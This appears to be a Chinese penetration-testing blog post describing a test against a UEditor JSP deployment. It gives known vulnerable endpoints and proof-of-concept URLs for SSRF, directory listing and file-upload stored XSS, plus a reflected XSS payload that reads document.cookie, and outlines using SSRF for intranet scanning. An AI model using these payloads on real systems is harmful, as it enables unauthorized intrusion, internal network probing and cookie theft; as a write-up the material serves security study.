记一次对ueditor的捡漏之旅

  • A+
所属分类:代码审计

(已知目标ip为1.1.1.1)

使用fofa看看有哪些web服务:记一次对ueditor的捡漏之旅

我一般会习惯性的F12、刷新看看网站会加载哪些资源(总会出现一些奇妙的路径)

如图:记一次对ueditor的捡漏之旅

ueditor+jsp

  • SSRF

  • 目录遍历

  • 文件上传 => Stored XSS

  • 反射型XSS

首先确定ueditor的版本记一次对ueditor的捡漏之旅

阅读js源码发现,可以在控制台通过UE.version获得editor的版本

console.log(UE.version)

记一次对ueditor的捡漏之旅


SSRF

已知该版本ueditor的ssrf触发点:

/jsp/controller.jsp?action=catchimage&source[]=/jsp/getRemoteImage.jsp?upfile=/php/controller.php?action=catchimage&source[]=

使用百度logo构造poc:

http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png

成功,ssrf一枚!

记一次对ueditor的捡漏之旅记一次对ueditor的捡漏之旅

对于后续利用姿势:

  • 内网探测

  • 应用识别

  • 漏洞利用

  • ......

简单叙述一下扩大战果的思路:

  进行内网探测,查看内网开放的主机和端口。然后通过访问开放的端口返回的一些特征去识别在该服务器上部署的服务与应用,最后针对性地采用一些payload去判断是否存在漏洞。

这里附上ssrf内网探测的脚本:

(来源:猎户攻防实验室)

记一次对ueditor的捡漏之旅


文件上传 => Stored XSS

已知其上传路径为:

/asp/controller.asp?action=uploadimage /asp/controller.asp?action=uploadfile/net/controller.ashx?action=uploadimage /net/controller.ashx?action=uploadfile/php/controller.php?action=uploadfile /php/controller.php?action=uploadimage/jsp/controller.jsp?action=uploadfile /jsp/controller.jsp?action=uploadimag

xml xss poc:


记一次对ueditor的捡漏之旅


文件遍历:

已知该版本ueditor的文件遍历触发点:

/jsp/controller.jsp?action=listimage/jsp/controller.jsp?action=listfile/net/controller.ashx?action=listimage/net/controller.ashx?action=listfile...

根据漏洞触发点构造poc:

http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=listfile

记一次对ueditor的捡漏之旅

http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=listimage

记一次对ueditor的捡漏之旅


XSS

知该洞的触发点:

/php/getContent.php/asp/getContent.asp/jsp/getContent.jsp/net/getContent.ashx
# poc# myEditor中的’ E ’必须大写,小写无效。post myEditor=<script>alert(document.cookie)</script>

由于目标站点不存在该文件:

记一次对ueditor的捡漏之旅

所以我在网上找了一处案例来演示一番:

(图自:https://blog.csdn.net/yun2diao/)

记一次对ueditor的捡漏之旅


###分割线

      希望自己在每一次的复盘中都能有所收获。

      在我看来,学习的目的并不是为了证明你学到了什么,而是在每一次的学习/工作中去发现自己还有哪些技能/知识没有掌握,然后去跟进学习。

本文始发于微信公众号(don9sec):记一次对ueditor的捡漏之旅

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: